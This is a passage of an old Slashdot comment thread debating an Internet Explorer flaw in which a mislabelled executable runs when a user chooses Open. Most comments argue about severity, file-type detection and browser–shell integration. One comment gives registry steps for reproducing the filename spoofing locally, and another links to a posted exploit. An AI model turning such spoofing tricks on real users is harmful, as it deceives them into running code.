      Finally someone who read the article!!!

    2. Re:Hold on a sec . . . by jamie · · Score: 3, Interesting
      The Newsbytes article is a little confusing... it leads by claiming Microsoft "will" patch the flaw. But if you keep reading, you see that they originally did not consider it a flaw at all (which explains the slow response time). Then it turns out a beta of the patch has been tested internally, but then we see this:

      "A Microsoft spokesperson said the company does not currently have any information to share on the issue and declined to discuss the status of the browser patch."

      In other words, "no comment." Sounds to me exactly like "refusing to provide any information." So what was incorrect about Michael's writeup?

    3. Re:Hold on a sec . . . by Anonymous Coward · · Score: 0

      "refusing" and "not knowing" are not the same. Maybe they really don't have much to go by..

    4. Re:Hold on a sec . . . by afree87 · · Score: 1

      And I'm glad I switched to Opera. =P It's about twenty times faster, and tells me what's wrong when the page doesn't load, too.

  63. Security Through Obscurity by RedWolves2 · · Score: 1, Redundant

    The problem here is that some journalist got wind of a patch to soon and decided to write a story about it. I think that the media needs to think about what they write in terms of software security.

    I mean even since Sept. 11 all media outlets are rethinking what is and what isn't safe to release to the public in the name of national security.

    What they are overlooking is that security holes in software is also a breach in national security and they need to step back and decide if what they are releasing is appropiate. The argument could be made for this particular article either way.

    1. Re:Security Through Obscurity by dvdeug · · Score: 2

      > since Sept. 11 all media outlets are rethinking what is and what isn't safe to release to the public

      Is there any information the hijackers actually used such information? Or is this just raw terror? Or something more insidious - remember that the Pentagon Papers and the Nixon's tapes were matters of national security too.

    2. Re:Security Through Obscurity by austinc1 · · Score: 1

      Consider this a second for the other reply to this post. The alien and sedition acts had similar aims. Anyone who claims to be a patriotic American needs to stop accepting this terror induced bullshit.

      Censoring the press *is* terrorism in a country built on the basic principle of freedom of speech.

  64. Uhhh by Anonymous Coward · · Score: 0

    You might want to check Post Anonymously next time. You do realize Autodesk is one of the most rabidly anti-piracy companies on the planet?

    1. Re:Uhhh by Anonymous Coward · · Score: 0

      umm, do you actually think he works for Nasa?

  65. HTTP is not synonymous with HTML! by coyote-san · · Score: 5, Informative

    The upstream comment is 100% pure bullshit.

    When you're using Netscape or Lynx and the URL starts with "http:", it's speaking HTTP. It can use that protocol to send whatever type of data the server wants to send - text/html, application/x-pdf, whatever. You seem to be confusing HTTP and HTML - the communications protocol and what's being communicated.

    Meanwhile, the canonical way to identify the type of a file on a Unix system is to look at for "magic numbers," and then hopefully verify them by parsing what you think is the header and making sure checksums are valid, values are sane, etc. Any Unix application developer that looks at the extension *alone* should usually be fired on the spot. (The sole exception is completely unstructured text where you have to use it as a hint, e.g., ".c" means C, ".cc" means C++.)

    This isn't just a bad attitude, it reflects the fact that Unix tools have to deal with pipes and often don't have any filename (much less extension) associated with the data stream. If you require a file extension to understand what you have, you've crippled your application.

    --
    For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
  66. Re:Now that this particular cat is out of the bag. by Nate+Fox · · Score: 1

    That reminds me of my warez days on irc. When people used to offer up site lists via dcc bots, other people would merely have to type a certain command to begin a dcc send from the bot to them (something like: !list). One day, one of the OPs set his away message to: "0-day, 2000 site ftp list. All verified and working! Hit Alt+F4 to recieve the list!" Next thing you know, the channel of about 120 people turned into about 70 people. We almost got flooded off from the server messages 'NickX has quit' 'NickY has quit' 'Nickxxx has quit' et al. It was great.

  67. You are... by Svartalf · · Score: 2

    You're talking local versus server context. In the case of a local file, MS and Windows "KNOW" that it's not an executable because of extention. However, if the server tells the browser it's something completely different, it'll do it's level best to try to carry out the cuing from the server- i.e. if it swears it's an aplication of the type MS understands, it'll try to run it, even if the extention is ".txt". At least that is my understanding of the flaw in the browser.

    --
    I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
  68. A perspective by Vicegrip · · Score: 4, Insightful

    The concern, from what I understand, is that a user might be lead to believe that "readme.txt" will be opened and viewed as a text file by IE. This, when in fact the website has placed executable binary/script data in the file and changed the appropriate response headers so that IE is fooled in to executing it as a program if it is 'opened'.

    All the user sees as a prompt is "Open" or "Save Target As" using the menu options OR again "Open, Save, Cancel" by clicking on the link.

    For an inexperienced user, the appropriate option will probably not be obvious. This is because many users have a lot of trouble navigating the file system to find files that have been saved by applications and enjoy the shortcut of having the windows decide how the file should be 'opened'.

    I agree that an experienced user would never choose open because they know this is very risky. But, in my mother's case, she has trouble deciding when to click and doubleclick.

    In Microsoft's defence, however, the "Open" option is never the default. Thus, it's probably safe to say that an ignorant user will almost always be safe from this attack as they will be picking the default and saving the file to the disk. At that point, "readme.txt" will cannot be executed and only openable from a text editor.

    Anyways.. no matter how you look at it, this is a problem that fundamentally involves the act of downloading a file. Something even my mother knows not do by herself. This is not a security issue in the same magnitude as the worm viruses that plagued IIS.

    --
    Do not spread "09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0" over the internet, thank you.
    1. Re:A perspective by Anonymous Coward · · Score: 0

      Of course it's all speculation at this point, but I gather the basic idea is find a mime type which is automatically opened by IE and/or appears harmless, give it an extension with is automatically run and/or defaults to Open, and that when run will execute arbitrary code. I'm sure once you realize what's going on it's just a matter of trial and error to determine the optimal combination.

    2. Re:A perspective by Mwongozi · · Score: 2
      You've got it the wrong way around. The bug involves having executable files (eg. "hax0r.com" or "killme.exe") sent to IE with the wrong content-type. (eg. "text/html").

      IE is still going to ask you "Would you like to run killme.exe?", and if you answer yes, it's your own damn fault.

      There's no way to hide an executable inside, say, a text file. Windows will just throw it at Notepad.

    3. Re:A perspective by rseuhs · · Score: 3, Insightful
      All the user sees as a prompt is "Open" or "Save Target As" using the menu options OR again "Open, Save, Cancel" by clicking on the link.

      For an inexperienced user, the appropriate option will probably not be obvious. This is because many users have a lot of trouble navigating the file system to find files that have been saved by applications and enjoy the shortcut of having the windows decide how the file should be 'opened'.

      I agree that an experienced user would never choose open because they know this is very risky. But, in my mother's case, she has trouble deciding when to click and doubleclick.

      I can't believe how fast every design flaw in IE/Outlook/Windows is becoming "the user's fault".

      There is a lot of non-html content on the net and when I encounter a .pdf I press "open" without a second thought, I do it all the time.

      Is it really asking too much that Internet Explorer and Outlook tell me the *real* file type? What's the big advantage in hiding file extensions and messed up concepts like this?

      This is not just another bug, it is a DESIGN flaw.

      Before you ask: No I don't use Outlook/IE and those security flaws are one of the reasons. I don't consider people stupid who were fooled by Outlook. (it was Outlook and not ILOVEYOU who made the users believe it was just a textfile. I don't consider a user stupid because he believed Outlook. You can't expect a newbie to know that you can't trust Microsoft's programs) But I do consider people stupid who recommend Outlook and Internet Explorer to newbies.

      There are a lot of alternatives out there.

    4. Re:A perspective by Anonymous Coward · · Score: 0

      "In Microsoft's defence, however, the "Open" option is never the default."

      Actually, I've noticed recently that for a fresh install of IE6 when downloading from a site files that are (presumably) not spoofed in this manner (Microsoft's download site). The default is indeed to open the file instead of saving (it looks like the Open butten got the default focus). Did this bother me enough to use a different browser, sure, except when I have to test w/ IE.

    5. Re:A perspective by cHALiTO · · Score: 1

      The dialog would prompt the user to choose whether he/she wants to "open this file from its current location" or "save this file to disk". The file name and extension may be anything the malicious website administrator (or a user having access there) wishes, e.g. README.TXT, index.html, or sample.wav. If the user chooses the first alternative, "open the file from its current location", an .EXE application is actually run without any further dialogs.

      it spoofs the filename. what part of it didnt you understand? go read the article.

      --
      "Luck is my middle name," said Rincewind, indistinctly. "Mind you, my first name is Bad." -- Terry Pratchett
    6. Re:A perspective by Anonymous Coward · · Score: 0

      please reword that.

      expierienced needs to be replaced with smart. I have at least 5 users here who have used their computers (and the computers that replaced the computers they are on now) for 5 years now. They sill havent a clue and open everything sent to them.

      Why? because they are stupid, end of story.

    7. Re:A perspective by muffen · · Score: 1

      The concern, from what I understand, is that a user might be lead to believe that "readme.txt" will be opened and viewed as a text file by IE. This, when in fact the website has placed executable binary/script data in the file and changed the appropriate response headers so that IE is fooled in to executing it as a program if it is 'opened'.

      This is wrong! IE is not fooled to do anything. IE will correctly open this file in the associated program for this file, which is (on most Windows computers) notepad. If it contains binary data, I guess you'll see some garbage. If you can tell me how this could ever be used in such a way that an MZ/PE file with the extension .txt will be executed as an executable file, then I'll believe you.

      The problem here are files with the extension .scr, .ocx and .dll. These are all PE files. In other words, when choosing "open" in IE, after clicking on the filename, the file will be executed.
      Personally, I don't consider this beeing a bug at all. If you choose open on a PE-file, you should expect it to execute.
      I do however agree with the argument that most users have no idea what a PE file is... the question is though, does that make it a bug?

      My opinion, this is overblown 1000 times in media.

    8. Re:A perspective by Anonymous Coward · · Score: 0

      Offtopic kind of, you can hide files within files, but it won't execute them.

    9. Re:A perspective by Lxy · · Score: 2

      Anyways.. no matter how you look at it, this is a problem that fundamentally involves the act of downloading a file. Something even my mother knows not do by herself.

      Never underestimate human stupidity. Actual conversation I had with a user who opened a virused EXE: "But, this person I don't know sent me this EXE. I figured it was someone I know playing a joke". This was just recently, after many, many, many e-mails from the IS department about opening files that you don't know the origin of. STUPID people refuse to die, and most of them use IE.

      --

      There is no reasonable defense against an idiot with an agenda
      :wq
    10. Re:A perspective by Ionized · · Score: 1

      no. please read the article.

      the problem lies in being able to lie to the end user about the filename. you get a dialog asking if you wish to save or open foo.txt

      if you choose save, it saves to your harddrive as its real filename, foo.exe

      if you choose open, it executes whatever nasty code foo.exe happens to be.

      it is indeed a hole/bug/design flaw. just not as serious a flaw as michael makes it out to be - you still have to tell IE to open the file, you are just being given false information as to what type of file you are opening.

    11. Re:A perspective by Score+Whore · · Score: 1

      You apparently didn't read the article. The problem is that the webservers are sending files called "niceboobies.jpg" with a content type of application/executable (or whatever it is) and people are seeing a file labeled as a .jpg and opening it. IE then says, well it's a application/executable and runs the thing.

      However the idiot who wrote the lead to this set of comments is truly stupid. Why is it that stupiddot "editors" write such blatantly false crap? IE will NOT automatically run this crap.

    12. Re:A perspective by damiam · · Score: 1

      It's the other way around, for example having file "h4x0r.html" sent with an "application/windows-exe" or whatever the MIME tye for tht is. IE will ask "Would you like to view 'h4x0r.html'?", but will run the program instead if you click yes.

      --
      It's hard to be religious when certain people are never incinerated by bolts of lightning.
    13. Re:A perspective by Anonymous Coward · · Score: 0

      If you choose open on a PE-file, you should expect it to execute.
      I do however agree with the argument that most users have no idea what a PE file is...


      You agree that most users have no idea what a PE file is but nevertheless you feel that they should expect it to execute? Is that double-think or just no thought?

    14. Re:A perspective by QuadGoatBoy · · Score: 1

      It appears that IE6 is not vulnerable to this file extension spoofing. So, the default in IE6 does not pose a problem. QuadGoatBoy "As long as I have legs, I will run with the squirrels..."

  69. Shame shame shame by Cuthalion · · Score: 0, Offtopic

    Thanks, Timothy, for your unwarranted alarmism. Saying that "any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything," with the implication there's nothing you can do about it is ridiculous.

    An accurate summary of the article:

    Any web page you visit or any email you open can cause a dialog box to pop up, prompting you to save or open a file. The filename may be wrong on this dialog. If you choose open, you recieve no farther warnings before potentially malicious code is run. If you choose save, it prompts you where to save it, and saves it there. (At that point it's relatively safe - if the filetype is still wrong, you can't execute it, if it's not wrong, you can see it's an exe).

    A patch wouldn't help much - the people who are up on things enough to install it are the same people who will know to take the SIMPLE PRECAUTION of not opening unknown files directly off the web.

    It is a shame that due to a bug in their browser MSIE doesn't run sirens and blinking lights and threaten the possible destruction of your computer every time you try to run any code that you didn't write yourself, but it doesn't exactly open your box up to the world or anything.

    In conclusion, let me say screw you and your shitty biased reporting, slashdot.

    --
    Trees can't go dancing
    So do them a big favor
    Pretend dancing stinks!
    1. Re:Shame shame shame by Cuthalion · · Score: 1

      Thanks, Timothy, for your unwarranted alarmism.

      Shit, change that to Michael. I suck.

      --
      Trees can't go dancing
      So do them a big favor
      Pretend dancing stinks!
    2. Re:Shame shame shame by RedWolves2 · · Score: 1

      Looks whos talking about shitty reporting. Did you just skim for the highlights so you could rant a little.

      The exploit for those of you that are not reading the Article is that a web page could be spefically written in a way that a file could be downloaded to your computer and ran WITHOUT YOUR AWARENESS.

      This means that you WOULD NOT get the prompt to open...save..or cancel.

      For god sakes people read the article before offering an opinion.

  70. How to do this by pmlyon · · Score: 0
    If I'm understanding the article correctly, this is fairly easy to do. For those of you running windows, follow these instructions.
    1. Open up regedit.
    2. Go to the ".doc" key under HKEY_CLASSES_ROOT.
    3. Change the (Default) value to read "exefile".
    4. Copy any executable file and rename it with a ".doc" extension.
    5. Make an html page that links to the renamed executable.
    6. Click on the link in your html page. It will look as if you are simply opening a ".doc" file, but you will actually run the executable once you select "Open".
    1. Re:How to do this by pmlyon · · Score: 0

      Sorry to reply to my own post, but I'm a dumbass. You can't set the ".doc" file to be an "exefile" from the HTTP header. You have to find some mime-type that makes it execute instead. I've tryed "application/octet-stream", but that doesn't work. I'm not sure what mime-type you would have to use.

  71. Yeah, exactly by Anonymous Coward · · Score: 0

    Read what Micheal is saying again.

  72. Only works for integrated browsers by Starship+Trooper · · Score: 2, Informative
    This hole only works if the browser-shell integration "feature" of IE >4.0 is enabled. This is easy to disable, if you happen to have a Windows 95 CD on hand:
    • Copy your current explorer.exe, shell32.dll, comdlg32.dll, notepad.exe and wordpad.exe to a backup location in case things go haywire. (I've done this before on Windows 98 and ME boxes without problems, but it's always good to be safe).
    • Insert the Windows 95 CD, and start a dos prompt.
    • From the prompt, enter:

      d: (or whatever your CD drive is)
      cd win95
      extract /a /l c:\your\windows\desktop win95_02.cab comdlg32.dll explorer.exe shell32.dll notepad.exe wordpad.exe

    • You should have the files listed above appear on your desktop. Now shut down into DOS mode, and copy the new shell32.dll and comdlg32.dll into your Windows SYSTEM directory, and copy explorer.exe, notepad.exe and wordpad.exe into your WINDOWS directory, and reboot Windows. (If you're using ME, you can go into c:\windows\system.ini and change your shell to taskman.exe in order to be able to replace explorer and the other system files)
    Your system should come up with the old Windows 95 shell, which doesn't have any of the IE integration bullshit. IE will still launch as a separate application (with an Office-style splash screen, even!) and since the IE dll's aren't stuck in your memory all the time, your system should be a bit faster too.

    Of course, after doing this, the next step is to replace your browser, but that goes without saying. :-)

    --
    Loneliness is a power that we possess to give or take away forever
    1. Re:Only works for integrated browsers by Anonymous Coward · · Score: 0

      cool, thanks I was getting sick of that stupid channel bar ;)

  73. Intergating Web Browser and File Browser by Tachys · · Score: 5, Insightful

    I notice many people complain about MS using the web browser and file browser as the same thing. But it seems everyone else is doing that too. KDE's Konqueror is a combined web/file browser. Nautilus also does this. If this is such a bad idea why is everyone doing this. The only desktop that I know of that doesn't try to do this is the Mac OS.

    1. Re:Intergating Web Browser and File Browser by Anonymous Coward · · Score: 0

      Konqueror and Nautilus are completely optional extensions. They are not built into any operating system. My XFree86+WindowMaker setup does not contain any sort of integrated file manager+web browser software. IE on the other hand is completely integrated into the system. Any flaws in their web browser may pose tremendous problems with the file system beneath.

    2. Re:Intergating Web Browser and File Browser by conan_albrecht · · Score: 2, Insightful

      There is a very big difference between Konqueror and IE. Sure, they both integrate file and web browsing, but Konqueror is limited to what my user can do. It is not integrated into the Linux *kernel*. It runs as a User application with only user rights.

      On the other hand, IE is integrated right into Windows itself. It effectively has administrator (Unix speak--root) priviledges. Hence much more drastic effects when it runs rogue code.

    3. Re:Intergating Web Browser and File Browser by babbage · · Score: 4, Insightful
      And with Apple's proposed adoption of file extensions as the standard filetype recogntion scheme, they'll be in the same boat as all the others anyway. The more I think about it, the more I realized what an interesting area file metadata & it's repurcussions is.

      Stong metadata allows applications like Signwave FinderMail to exist (individual emails are stored as individual files, and handled in the Mac Finder like any other files, in folders and sorted by date and so on), and it was what BeOS was pushing hard & well with their advanced filesystem, and Microsoft may be copying in supposed plans to make their next generation filesystem out of SQL Server, rather than NTFS.

      It seems like file extensions suck as a way of managing all this, and I think all the major vendors & open source development groups realize this, but it's a lowest common denominator that we're having a hard time shaking off.

      And that brings me to my point and my question. Does this problem affect only the Windows versions of IE, or is it a problem on the Macintosh too. What is the proposed fix to this? Clearly it seems to be an architectual problem, but will the solution also be architectual? Will MS accelerate any efforts to move away from file extensions? (I doubt it, but you can always hope...). Will this discourage Apple from adopting them while deprecating what they've used in the past? I'd like to see how big the fallout of this could be, particularly if an nasty exploit crops up & there's no easy fix. Hmm...

    4. Re:Intergating Web Browser and File Browser by foobar104 · · Score: 2

      On the other hand, IE is integrated right into Windows itself. It effectively has administrator (Unix speak--root) priviledges. Hence much more drastic effects when it runs rogue code.

      Can somebody confirm this to be true? I run Windows 2000 on my desktop at work, and I choose not to log in as an administrator when I do day-to-day stuff.

      Is it true that when I open IE, it runs as a privileged process (or whatever the Windows equivalent of a process is)?

      You'll have to forgive (or, more likely, applaud) my ignorance, but I just don't know how to find out for myself. Every time I type "ps" at the Windows command prompt, I get an error message. ;-)

    5. Re:Intergating Web Browser and File Browser by siegesama · · Score: 1

      Primarily because even though nautilus tries to do everything like that (eating up ALL MY MEMORY in the process), I can simply go in and turn it off. And without nautilus gnome RUNS PERFECTLY FINE. Try taking the "explorer" out of windows.

      --
      what the hell is a 'junk character', anyway?
    6. Re:Intergating Web Browser and File Browser by stubear · · Score: 1

      IE runs under the users permissions. If you have admin permissions then IE has Admin permissions. If you have guest permissions, then IE has guest permissions.

    7. Re:Intergating Web Browser and File Browser by bnenning · · Score: 5, Informative
      And with Apple's proposed adoption of file extensions as the standard filetype recogntion scheme, they'll be in the same boat as all the others anyway.


      Any Mac OS X users interested in changing Apple's policies on file extensions should see the Mac OS X Metadata Petition. Yes, online petitions normally don't count for much, but John Siracusa has been very active in trying to get Apple to rethink this subject.

      --
      How to solve most of our problems: 1.Lots of nuclear plants. 2.Cure aging.
    8. Re:Intergating Web Browser and File Browser by Stauf · · Score: 1

      Hit 'Ctrl-Shift-Esc' under processes, look for IEXPLORE.EXE, look in the User Name column. If it lists it as LOCAL SERVICE or SYSTEM (or Administrator, but I doubt that'd show up), then it has permissions (well, it has the potential to have the permissions) over your entire system.

      But by default, IE doesn't have any more privelege then explorer.exe, which is run by the current user. So unless you've changed stuff, you ought to be safe.

      However, Windows does wierd things with requests to other services. For example, explorer.exe can make a call to svchost.exe, which can cause system-wide damage. Possible, but rare.

    9. Re:Intergating Web Browser and File Browser by Ambassador+Kosh · · Score: 1

      Konqueror is NOT a web browser, file browser,
      text viewer, image viewer etc. However it is an app
      that can embed any kpart in it. What you are using
      when viewing the web is khtml which is available
      to any kde application. When you view a text file
      you usually embed kedit or kate. For the filesystem
      you are using the various kio slaves depending on
      what you use it for. Viewing a web page in konqueror
      is just like embedding konsole is kate or kate in
      konqueror or various text objects in kdevelop or khtml
      in kdevelop and so on.

      Konqueror just uses the object model.

      --
      Computer modeling for biotech drug manufacturing is HARD! :)
    10. Re:Intergating Web Browser and File Browser by TummyX · · Score: 2, Insightful

      what bullshit. IE isn't integrated into the kernel. It is integrated into windows. E.G. IE has taken over explorer's role as the shell. The shell still runs with user priviledges.

      Does something have to be in the kernel to be 'integrated' into the OS? IE is an integral part of Windows XP as BASH (or even Gnome) is an integral part of Redhat 7. Both products would be drastically changed without them.

    11. Re:Intergating Web Browser and File Browser by Ambush · · Score: 1
      no no no...

      File manager and integrated web browser might be less than perfect, but operating system with integrated web browser....now that's just plain evil.

      --
      There are 10 kinds of people; those who know ternary, those who don't, and those now hunting for a dictionary.
    12. Re:Intergating Web Browser and File Browser by Quarters · · Score: 2

      >>Try taking the "explorer" out of windows.

      http://www.litestep.net/
      http://www.openvision.50megs.com/

      You can even (at least on 9x) configure Windows to come up with the old Windows 3.x file/desktop manager.

    13. Re:Intergating Web Browser and File Browser by Lumpy · · Score: 1

      nautlis solves this problem with a simple security feature.

      Consume all available processor time and memory space to protect the system.

      --
      Do not look at laser with remaining good eye.
    14. Re:Intergating Web Browser and File Browser by Jburkholder · · Score: 2

      Obviously you're talking about NT/2000 & probably XP as well. What about 95/98/ME? Correct me if I'm wrong, but IE under 9x would have plenty of authority to do whatever it likes?

    15. Re:Intergating Web Browser and File Browser by protonman · · Score: 1

      Correct me if I'm wrong, but IE under 9x would have plenty of authority to do whatever it likes?

      Sure, but that's not IEs fault. Everything in Win95/98/ME has permission to do whatever it feels like. Even if you attrib +r your files, every stupid batchfile can easily remove your restrictions again, and then delete your files. There is virtually no concept of permissions in Win 9x.

      --
      The man of knowledge must be able not only to love his enemies but also to hate his friends.
    16. Re:Intergating Web Browser and File Browser by Tony-A · · Score: 1

      Poo.
      IE will have a number of hooks and backdoors into the system, even if what is visible only runs as the user.
      As for bash or Gnome being an integral part of Redhat 7, either can be replaced even by nincompoops like me.

    17. Re:Intergating Web Browser and File Browser by Jburkholder · · Score: 1

      >Sure, but that's not IEs fault

      Its not Outlook's fault either. The problem is in the design of applications that can receive and execute files from untrusted network sources and have carte blanche with the filesystem. At least with NT, you would be limited to the user's permissions, with 9x you can rename c:\windows to c:\urfscked

      (I'm sure I'm not saying anything that hasn't already been said, just clarifying my response to the original post that said something about IE only having user permissions - I guess that is still true to the extent that 9x has no user security (don't know the password? Just hit 'esc' and you can still get in and blow away whatever you like))

    18. Re:Intergating Web Browser and File Browser by Anonymous Coward · · Score: 0

      moderators that cnt recognize humor...

      Typical on slashdot.

    19. Re:Intergating Web Browser and File Browser by TummyX · · Score: 1


      IE will have a number of hooks and backdoors into the system


      Do you have proof or is this just wild speculation?


      As for bash or Gnome being an integral part of Redhat 7, either can be replaced even by nincompoops like me.


      Well duh. IE can be 'replaced' as the shell too. All software (especially microsoft software) is componentised. You can easily replace IE as the shell with something else like KDE, Gnome or File Manager.

      We're not talking about whether they can be replaced. We're talking about wether they're integral or not.

      If you delete all the IE libraries, then you don't get all the HTML rendering components. Don't expect to be able to use Windows Help.

      If you delete gnome from redhat 7, you lose an integral part of RH7 including HTML rendering components. Don't expect to be able to use Gnome's help browser.

    20. Re:Intergating Web Browser and File Browser by Anonymous Coward · · Score: 0

      Since when are the Windows-wannabes like KDE and Nautilis, "everyone else"? So Windows and Linux are both starting to suck, and MacOS isn't. If those three platforms are the whole world to you, you live in a fucking small world.

    21. Re:Intergating Web Browser and File Browser by Anonymous Coward · · Score: 0

      I would like to point out now that I don't use KDE or gnome. Want a REAL file browser? Try gentoo, ask freshmeat.net. wmaker, mozilla, and gentoo, plus an rxvt is a nice combo. :)

    22. Re:Intergating Web Browser and File Browser by StormReaver · · Score: 1

      Both Konqueror and Nautilus are separate from the underlying operating system and can be removed, replaced, or just not used. Neither is tied to the kernel, and neither is fundamentally integrated into the operating system core. Both are merely applications, not an integrated part of the kernel.

      Microsoft has intertwined the browser code with the operating system code inside the very core of Windows. The Windows core code jumps directly into the browser code to perform operating system tasks. Even if you disable Internet Explorer and choose to use another browser, Internet Explorer is still handling fundamental Windows functions behind the scenes. You have no choice in the matter. You are using Internet Explorer to carry out core operating system functions, and the primary reason MS did this was to crush all other web browsers (particularly Netscape).

    23. Re:Intergating Web Browser and File Browser by stubear · · Score: 1

      That's because the multi-user environment in Windows 3.x and 9x was duct-taped on. These OSes were never meant to run in as multi-user machines. While this is not really a good excuse, it's how these OSes were developed.

      NT and its successors were designed to be multi-user systems running in a networked environment. User permissions and the like are all a part of this method of OS design.

      Also, Outlook and IE allow users to define how a web page is handled. Perhaps it's not the most intuitive way to approach this problem but security zones work rather well for deciding how a web page it opened and what it can do.

    24. Re:Intergating Web Browser and File Browser by Liquor · · Score: 1

      File extensions may not be an ideal way of managing this, but they DO allow a simple syntax to specify widely used file types.

      I'd hate to have to replace hello.c with something that looked like hello;source/c;application/text;editable/emacs

      --

      Liquor
      Sanity is a highly overrated commodity.
    25. Re:Intergating Web Browser and File Browser by Anonymous Coward · · Score: 0

      >KDE's Konqueror is a combined web/file browser

      Not exactly. Konqueror is highly modular. It displays HTML using a KHTML part, and it also handles other "viewable" stuff (images, applets, pdf files etc) using KParts. Apart from that, it can also handle a large number of protocols (ftp, smb, sftp, pop3, imap...) and
      pseudo-protocols (man, info, printers...) using IO-slaves just like any other KDE application. This is IMO very unix-like abstraction towards integration (remember that anything in Unix, from your soundcard to /dev/null is a file). Same goes for KDE: many different sources of information can be accessed in a unified manner through IO-slaves. This is very-very different from putting all the features of a browser and a file manager in the same app.
      It would be more accurate to say that konqueror is a shell which can embed many different services, including a File Manager and a Web Browser (an a man tool, and a printer manager, and a pop3 manager, and
      an FTP client, and...)

      Plus Konqueror uses /etc/magic when in file browsing mode and all W3C standards in web browsing mode.

    26. Re:Intergating Web Browser and File Browser by Tony-A · · Score: 1

      Current crop of worms and viruses seems proof enough.

      All software (especially microsoft software) is componentised.
      So is PC hardware. That's why I can plug a SCSI disk into an IDE controller and it just works. NOT.

      You can easily replace IE as the shell with something else like KDE, Gnome or File Manager.
      Now that would be interesting to see. KDE running on Windows.

      Konqueror seems to run just fine on RH 7.2 without Gnome. If Gnome's help browser doesn't work there are alternatives that do.

    27. Re:Intergating Web Browser and File Browser by Anonymous Coward · · Score: 0

      The only desktop that I know of that doesn't try to do this is the Mac OS.

      That doesn't say much, considering Windows and MacOS are really the only two desktop OS's. So, by saying "the only one that isn't doing it" you really mean "one is doing it and one is not." Brilliant observation.

    28. Re:Intergating Web Browser and File Browser by DunbarTheInept · · Score: 2
      But the thing is, any completely functional web browser must deal with the "file:" URL type. Once you have that functionality embedded inside the browser, you are 80% of the way to having a fully functional file manager tool.

      And *that* is why they are being merged together. Keeping them seperate duplicates a lot of functionality.

      The solution is to invoke different rules when the ftp: and http: protocols are in use from when the file: protocol is in use. Stuff you normally allow via the local file: window (like letting a user doubleclick a program file to run it) should not be allowed from a remote site during http: or ftp: file list displays.) But there's no need to rewrite the whole browser tool just to make a local file manager. Just flag certain security blocks based on if the files are local or remote.

      --

      Don't label something "offtopic" unless you know the topic well enough to tell what's on topic.

  74. Sure they can by volpe · · Score: 2

    Sure, MS can be sued for negligence, just like they can be sued for antitrust violations. You may even win, if you can prove that you suffered actual harm from this. And then the judge will ask Microsoft what they think they should have to do to compensate you, and Microsoft will say that they should give you a sticker that you can stick on your monitor that says "Don't open files from their current location. Always save to disk!". So in the end, Microsoft will stick it to you.

  75. Re:Specifics by Anonymous Coward · · Score: 0

    The details were revealed by StatiC on bugtraq. He seemed to discover a way to do it a few months ago, but didn't "put 2 and 2 together" about using a .exe extension until the generic advisory without details was published about 2 weeks on bugtraq.

    Details and exploit:
    http://www.securityfocus.com/archive/1/243017

  76. Re:Now that this particular cat is out of the bag. by RedWolves2 · · Score: 1

    I didn't say it was a great solution I just said it was a solution.

    An even better solution is to use paper and pencil.

  77. Nope, not true. My system uses magic. by Flammon · · Score: 1

    Nautilus on my Debian GNU/Linux system depends on magic to determine file type and it is very reliable.

    but examining the file extension to determine type is hardly an IE-only thing.

    IE does however depend on the file extension to determine whether the file is executable or not. Anyone can send you a file with a .exe .com or .bat extension and it automatically becomes executable when you save it. On Linux an other UNIX systems, a file is executable when that permission is given, executability is not determined by its extension. So you would have to do a chmod +x file after downloading a file to be able to run it.

  78. parent is pandering by buzzini · · Score: 3, Insightful

    This is a shameless pandering to the preconceptions of the Slashdot crowd. The statement that "Nobody is willing to do an honest cost accounting for the top guys" is simply not true, and it's an unfair dismissal of IE's very real successes in that space.

    IT guys can and do choose other browsers. Last I heard, Navigator still had over 1/3 of the corporate browser market. Suggesting that IT folk would be cowed by the "top guys" flies in the face of every experience I've had with them: that they're pragmatic, honest, and outspoken.

  79. what I'd like to know by Ender+Ryan · · Score: 2, Offtopic
    What I'd like to know, with regards to IE, is why the fuck can't it handle PNG's with alpha transparency properly yet?

    How many fucking years have they had to do this? How many fucking years longer are we going to rely on GIF (fucking cringe) for transparency because 85% of web browsers are using IE?

    How many other browsers have implemented alpha transparency in PNG's in absolutely no time at all? Mozilla, Konqueror, Opera... are there any more? Why the FUCK can't IE, which is supposedly the best browser there is, handle it?

    Pardon my absolutely mindless lunatic ranting... just really pissed that PNG's still aren't an option... thanks to IE.

    --
    Sticking feathers up your butt does not make you a chicken - Tyler Durden
    1. Re:what I'd like to know by Slitwrist · · Score: 0

      Amen to that!

      PNG's rule, GIF's are older than IE itself, which says something....

      --
      Carpe Noctem -=- Seize The Night
    2. Re:what I'd like to know by Anonymous Coward · · Score: 0

      How to get a good mod score:

      a) Act like you're incensed
      b) Curse like a mutha, to prove that you really are mad
      c) Be mad at the MPAA, RIAA, the corporate establishment, microsoft, or an intellectual property hoarder.
      d) Present a one-sided story

    3. Re:what I'd like to know by Skuld-Chan · · Score: 1

      Don't forget to ask "when someone will port linux to it"

  80. I can see it now by Jucius+Maximus · · Score: 2, Funny

    There must have been a huge party at FBI headquarters on Nov 19 (when this was reported to MSFT) since they finally had a viable delivery system for Magic Lantern.

    1. Re:I can see it now by dakoda · · Score: 0

      ooo, thats kinda scary... i wonder if thats why ms refuses to fix it...

  81. Fire Michael by EchoMirage · · Score: 3, Insightful

    Microsoft designed their web browser with the goal of doing what was best for Microsoft (evading anti-trust charges) rather than doing what was best for their users. In fact a proper "fix" of this hole probably involves de-integrating their browser and local file handling to some extent.

    Hey Malda and VA Software executives, or whoever is in charge of keeping a minimal amount of decency on this site: why do you keep letting crap like this make the front page? This is not informative, insightful, or in any way useful. This is just a rant by a pissed-off bigot, pure and simple.

    The vulnerability is real, but it is presented in such a hate-filled manner that it's unbearable to read. Michael has done nothing but spew venom in this posting. He's doing the right thing by bringing this to the attention of millions, but he does so with only malicious subtext to his main point.

    This reads like a stream-of-conciousness scream from a 13-year-old who's just had his Nintendo taken away from him. This isn't journalism, it isn't even information, it's just garbage.

    Please, do us all a favor: if Michael can't clean up his act and give us his material in at least a somewhat-presentable manner, fire him. You're losing respect for your site with postings like this. And no, this is not a troll, I'm serious.

    1. Re:Fire Michael by Anonymous Coward · · Score: 1, Insightful

      Agreed!
      Everytime I read crap like this I visit /. less and less.

      If you can't give un-biased (or even somewhere CLOSE to that realms) reports, then don't bother.

      Getting tired of this, you either hear rhetoric and propaganda from one side, or you hear it from the other. And I would LIKE to believe that the parties involved with this site are better than that!

    2. Re:Fire Michael by duplicate-nickname · · Score: 1

